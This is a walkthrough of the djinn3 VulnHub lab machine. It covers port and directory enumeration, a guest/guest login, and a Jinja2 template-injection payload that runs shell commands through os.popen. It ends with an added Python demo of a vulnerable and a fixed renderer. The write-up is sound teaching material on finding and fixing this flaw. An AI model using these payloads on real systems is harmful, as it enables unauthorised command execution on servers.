djinn:3 vulnhub Walkthrough
I am back with another article, which is going to be full of new methods and privilege escalation techniques. The only reason I was not writing any blog posts was this VM (djinn3, a very good VM from VulnHub), and finally, after a lot of failures, I got root on it. Okay, so let's start.
walkthrough
IP of the target : 192.168.1.55
As usual, I started with an nmap scan to find the open ports and the services running on the system, using the command
nmap -sC -sV -Pn 192.168.1.55

I got quite a few open ports. Maybe port 80 can help me with the enumeration, so let's start from it.

Okay, we have a website on port 80. I tried visiting every page listed in the navigation bar but got nothing, so now it's time for a directory brute force. I personally like wfuzz because of its cleaner interface (you can use any tool you want).
wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200 --hc 404 http://192.168.1.55/FUZZ
But I got nothing except /images with a 301 and /~checkout~ with a 403. Then I changed my wordlist to /dirb/big.txt and still got nothing except /~sys~, which is also forbidden. I don't know whether the ~checkout~ and ~sys~ directories are going to be useful for me or not, so I proceeded with the next port, 5000.

We have ticketing software. The most interesting line I found is "Under Development", which suggests this web app may have security issues. I clicked on the open link and found another web page with a GET parameter "id".

Hmm, smells like SQL injection, but it was not: I tried a lot but got nothing :(
Okay, the next port we have is 31337. I tried connecting to this port using nc.

I tried almost every common username and password, but none of them worked. Then I started searching on the internet for common credentials and found one that worked:
username => guest
password => guest
And yes, this worked. I was feeling so dumb at this point. How could I forget such an easy password :(
Anyway, let's continue with the application we have on port 31337.

There are many options here. I started with close (close an existing ticket).

I tried to close a non-existent ticket with id 1234 and got no output. Next I tried a valid ticket id I found on port 5000, 2973, and after this I again visited the page on port 5000 and yes, that ticket was actually deleted.
The next option I tried was opening a new ticket.

Again I visited the page on port 5000 and found a new ticket with the title "check", which means this function is working too. I tried including file names like /etc/passwd to check whether we could get LFI or RFI here, but got nothing. After spending a lot of time with this application, I still had nothing.
I checked the nmap scan again and found this line: 5000/tcp open http Werkzeug
Searching on Google about this revealed useful information.

Hmm, that was a big hint for me. Werkzeug means the whole application is developed using Flask, and a Flask application that renders user input as part of a template is vulnerable to SSTI (server-side template injection). I found a GitHub repository, PayloadsAllTheThings, and after working through it I found that this application is using Jinja2, because if we give the input {{7*'7'}} then the output will be 7777777 (Jinja2 evaluates the expression with Python semantics, and 7 * '7' in Python is the string '7' repeated seven times).

I opened the web app on port 5000 again, clicked on the link, and got this result.

I was on the right path, but "some payloads don't work exactly the way they are written", so after a lot of tries to get RCE from SSTI I succeeded with the payload:
{{config.__class__.__init__.__globals__['os'].popen('id').read()}}
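To show why the {{7*'7'}} probe and the popen payload above behave the way they do, here is an added example (my own code, not part of the original post or of the djinn3 VM). It needs only the jinja2 package. FakeConfig is an assumption: it stands in for flask.config.Config and mirrors only the traits the payload relies on, namely a dict subclass whose Python-level __init__ was defined in a module that imported os. That is the whole trick: any object's __class__.__init__.__globals__ is the module namespace where that __init__ was written, and flask/config.py imports os, so the template can reach os.popen without ever importing anything. The fixed renderer keeps the template constant and passes the untrusted text in as a context variable, which is what the ticketing app should have done.

```python
import os  # imported here so FakeConfig.__init__.__globals__ contains "os",
           # mirroring flask/config.py, which also imports os at module level
from jinja2 import Environment

PROBE = "{{7*'7'}}"  # detection payload from the post
RCE = "{{config.__class__.__init__.__globals__['os'].popen('id').read()}}"


class FakeConfig(dict):
    """Assumed stand-in for flask.config.Config: a dict subclass with a
    Python-level __init__ defined in a module that imported os."""

    def __init__(self, root_path=".", defaults=None):
        super().__init__(defaults or {})
        self.root_path = root_path


def render_vulnerable(user_input: str) -> str:
    """The bug: untrusted text is concatenated INTO the template source,
    like render_template_string("Ticket: " + request.args["id"]) would be."""
    template = Environment().from_string("Ticket: " + user_input)
    return template.render(config=FakeConfig())


def render_fixed(user_input: str) -> str:
    """The fix: the template is a constant and the user data only enters as
    a context variable, so Jinja2 prints it (HTML-escaped) and never
    evaluates it."""
    template = Environment(autoescape=True).from_string("Ticket: {{ title }}")
    return template.render(title=user_input, config=FakeConfig())


def rce_payload(cmd: str) -> str:
    """Same object walk as the post's payload, with the command parameterised
    so the demo does not depend on the `id` binary being present."""
    return "{{config.__class__.__init__.__globals__['os'].popen(%r).read()}}" % cmd


if __name__ == "__main__":
    print(render_vulnerable(PROBE))   # Ticket: 7777777      -> template injection confirmed
    print(render_vulnerable(RCE))     # Ticket: uid=...      -> expression walked to os.popen
    print(render_fixed(PROBE))        # Ticket: {{7*&#39;7&#39;}} -> printed, not evaluated
```

The probe is the cheap check to run first: a reflected 49 means a template engine evaluated arithmetic, while 7777777 specifically points at a Python engine (Jinja2 or Mako) because string repetition is Python behaviour. If the constant-template fix is not possible, Jinja2's sandbox (jinja2.sandbox.SandboxedEnvironment) refuses attribute names starting with an underscore, which breaks the __class__ walk, but keeping user input out of the template source is the real fix.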
